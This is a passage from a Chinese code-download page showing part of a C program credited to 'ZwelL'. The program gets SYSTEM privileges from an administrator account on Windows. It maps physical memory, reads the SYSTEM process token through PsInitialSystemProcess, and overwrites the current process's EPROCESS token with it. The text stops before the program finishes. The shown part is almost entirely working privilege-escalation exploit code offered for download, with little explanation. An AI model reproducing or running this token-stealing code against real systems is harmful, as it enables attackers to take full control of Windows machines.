⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 管理员组获取系统权限的完美解决方案.html

📁 里面收集的是发表在www.xfocus.org上的文章
💻 HTML
📖 第 1 页 / 共 5 页
字号:
🔍
12345 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;else return 0;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;return (PVOID)PAddr;<br />
}<br />
<br />
<br />
<br />
ULONG GetData(PVOID addr)<br />
{<br />
&nbsp;&nbsp;&nbsp;&nbsp;ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);<br />
&nbsp;&nbsp;&nbsp;&nbsp;PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys &amp; 0xfffff000, 0x1000);<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (tmp==0)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return 0;<br />
&nbsp;&nbsp;&nbsp;&nbsp;ULONG ret=tmp[(phys &amp; 0xFFF)&gt;&gt;2];<br />
&nbsp;&nbsp;&nbsp;&nbsp;UnmapViewOfFile(tmp);<br />
&nbsp;&nbsp;&nbsp;&nbsp;return ret;<br />
}<br />
<br />
BOOL SetData(PVOID addr,ULONG data)<br />
{<br />
&nbsp;&nbsp;&nbsp;&nbsp;ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);<br />
&nbsp;&nbsp;&nbsp;&nbsp;PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys &amp; 0xfffff000, 0x1000);<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (tmp==0)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return FALSE;<br />
&nbsp;&nbsp;&nbsp;&nbsp;tmp[(phys &amp; 0xFFF)&gt;&gt;2]=data;<br />
&nbsp;&nbsp;&nbsp;&nbsp;UnmapViewOfFile(tmp);<br />
&nbsp;&nbsp;&nbsp;&nbsp;return TRUE;<br />
}<br />
<br />
DWORD MyGetModuleBaseAddress( char * pModuleName)<br />
{<br />
&nbsp;&nbsp;&nbsp;&nbsp;PSYSTEM_MODULE_INFORMATION&nbsp;&nbsp;&nbsp;&nbsp;pSysModule;&nbsp;&nbsp;&nbsp;&nbsp;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;ULONG&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uReturn;<br />
&nbsp;&nbsp;&nbsp;&nbsp;ULONG&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uCount;<br />
&nbsp;&nbsp;&nbsp;&nbsp;PCHAR&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;pBuffer = NULL;<br />
&nbsp;&nbsp;&nbsp;&nbsp;PCHAR&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;pName&nbsp;&nbsp;&nbsp;&nbsp;= NULL;<br />
&nbsp;&nbsp;&nbsp;&nbsp;NTSTATUS&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;status;<br />
&nbsp;&nbsp;&nbsp;&nbsp;UINT&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ui;<br />
&nbsp;&nbsp;&nbsp;&nbsp;CHAR&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;szBuffer[10];<br />
&nbsp;&nbsp;&nbsp;&nbsp;DWORD&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;pBaseAddress;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;status = ZwQuerySystemInformation( SystemModuleInformation, szBuffer, 10, &amp;uReturn );<br />
&nbsp;&nbsp;&nbsp;&nbsp;pBuffer = ( PCHAR )malloc(uReturn);<br />
&nbsp;&nbsp;&nbsp;&nbsp;if ( pBuffer )<br />
&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;status = ZwQuerySystemInformation( SystemModuleInformation, pBuffer, uReturn, &amp;uReturn );<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if( NT_SUCCESS(status) )<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uCount = ( ULONG )*( ( ULONG * )pBuffer );<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;pSysModule = ( PSYSTEM_MODULE_INFORMATION )( pBuffer + sizeof( ULONG ) );<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for ( ui = 0; ui &lt; uCount; ui++ )<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;pName = strstr( pSysModule-&gt;ImageName, pModuleName );<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if( pName )<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;pBaseAddress = (DWORD)pSysModule-&gt;Base;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;free( pBuffer );<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return pBaseAddress;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;pSysModule ++;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;free( pBuffer );<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;return NULL;<br />
}<br />
<br />
DWORD GetEprocessFromId (DWORD PID)<br />
{<br />
&nbsp;&nbsp;&nbsp;&nbsp;NTSTATUS&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; status;<br />
&nbsp;&nbsp;&nbsp;&nbsp;PVOID&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;buf&nbsp;&nbsp; = NULL;<br />
&nbsp;&nbsp;&nbsp;&nbsp;ULONG&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;size&nbsp;&nbsp;= 1;<br />
&nbsp;&nbsp;&nbsp;&nbsp;ULONG&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NumOfHandle = 0;<br />
&nbsp;&nbsp;&nbsp;&nbsp;ULONG&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i;<br />
&nbsp;&nbsp;&nbsp;&nbsp;PSYSTEM_HANDLE_INFORMATION&nbsp;&nbsp;&nbsp;&nbsp;h_info&nbsp;&nbsp;= NULL;<br />
&nbsp;&nbsp;&nbsp;&nbsp;DWORD&nbsp;&nbsp;&nbsp;&nbsp;n;<br />
&nbsp;&nbsp;&nbsp;&nbsp;DWORD&nbsp;&nbsp;&nbsp;&nbsp;retvalue=0;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;buf=malloc(0x1000);<br />
&nbsp;&nbsp;&nbsp;&nbsp;if(buf == NULL)<br />
&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;malloc wrong\n&quot;);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return FALSE;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;status = ZwQuerySystemInformation( SystemHandleInformation, buf, 0x1000, &amp;n );<br />
&nbsp;&nbsp;&nbsp;&nbsp;if(STATUS_INFO_LENGTH_MISMATCH == status)<br />
&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;free(buf);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;buf=malloc(n);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(buf == NULL)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;malloc wrong\n&quot;);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return FALSE;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;status = ZwQuerySystemInformation( SystemHandleInformation, buf, n, NULL);<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;else<br />
&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;ZwQuerySystemInformation wrong\n&quot;);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return FALSE;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;NumOfHandle = *(ULONG*)buf;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;for(i = 0; i&lt;NumOfHandle ;i++)<br />
&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if( h_info[i].ProcessId == PID &amp;&amp;( h_info[i].ObjectTypeNumber == 5&nbsp;&nbsp;))<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;retvalue=(DWORD)(h_info[i].Object);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;if ( buf != NULL )<br />
&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;free( buf );<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;return retvalue;<br />
}<br />
<br />
void usage(char *exe)<br />
{<br />
&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;Usage : %s [exefile|-h]\n&quot;);<br />
}<br />
<br />
int main(int argc, char **argv)<br />
{<br />
&nbsp;&nbsp;&nbsp;&nbsp;HMODULE hDll;<br />
&nbsp;&nbsp;&nbsp;&nbsp;DWORD tmp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;DWORD SystemEprocess;<br />
&nbsp;&nbsp;&nbsp;&nbsp;DWORD SystemEprocessTokenValue;<br />
&nbsp;&nbsp;&nbsp;&nbsp;DWORD CurrentEprocess;<br />
&nbsp;&nbsp;&nbsp;&nbsp;DWORD CurrentEprocessTokenValue;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;\nIt is intended to get SYSTEM privilege from administrators group.\n&quot;);<br />
&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;\tMade by ZwelL.\n&quot;);<br />
&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;\tZwell@sohu.com.\n&quot;);<br />
&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;\thttp://www.donews.net/zwell.\n&quot;);<br />
&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;\tType -h to get more information\n&quot;, argv[0]);<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;if( argc&gt;=2)<br />
&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;( (strcmp(argv[1],&quot;-h&quot;)==0) &amp;&amp; (argc==2))<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|| (argc&gt;2) <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;usage(argv[0]);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit(-1);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (!InitNTDLL())<br />
&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;InitNTDLL wrong\n&quot;);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit(-1);<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (OpenPhysicalMemory()==0)<br />
&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;OpenPhysicalMemory wrong\n&quot;);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit(-1);<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;hDll = LoadLibrary(&quot;ntoskrnl.exe&quot;);<br />
&nbsp;&nbsp;&nbsp;&nbsp;tmp = (DWORD)GetProcAddress(hDll, &quot;PsInitialSystemProcess&quot;);<br />
&nbsp;&nbsp;&nbsp;&nbsp;tmp=MyGetModuleBaseAddress(&quot;ntoskrnl.exe&quot;)+(DWORD)tmp-(DWORD)hDll;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SystemEprocess=GetData((PVOID)tmp);<br />
&nbsp;&nbsp;&nbsp;&nbsp;tmp=SystemEprocess+TOKEN_OFFSET; //SYSTEM&#39;s Token address<br />
&nbsp;&nbsp;&nbsp;&nbsp;SystemEprocessTokenValue=GetData((PVOID)tmp);&nbsp;&nbsp; //SYSTEM&#39;s Token<br />
&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;System Process Token : 0x%08X\n&quot;, SystemEprocessTokenValue);<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );<br />
&nbsp;&nbsp;&nbsp;&nbsp;CurrentEprocess = GetEprocessFromId(GetCurrentProcessId());<br />
&nbsp;&nbsp;&nbsp;&nbsp;CurrentEprocessTokenValue = GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET));<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;Current EPROCESS : %08x\n&quot;, CurrentEprocess);<br />
&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;Current Process Token : %08x\nPress ENTER to continue...\n&quot;, <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;CurrentEprocessTokenValue);<br />
&nbsp;&nbsp;&nbsp;&nbsp;//getchar();<br />
&nbsp;&nbsp;&nbsp;&nbsp;SetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET), SystemEprocessTokenValue);<br />
&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;Current Process Token : %08x\n&quot;, <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;GetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET)));<br />
&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;Press ENTER to create process...\n&quot;);<br />
&nbsp;&nbsp;&nbsp;&nbsp;//getchar();<br />
<br />
12345

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -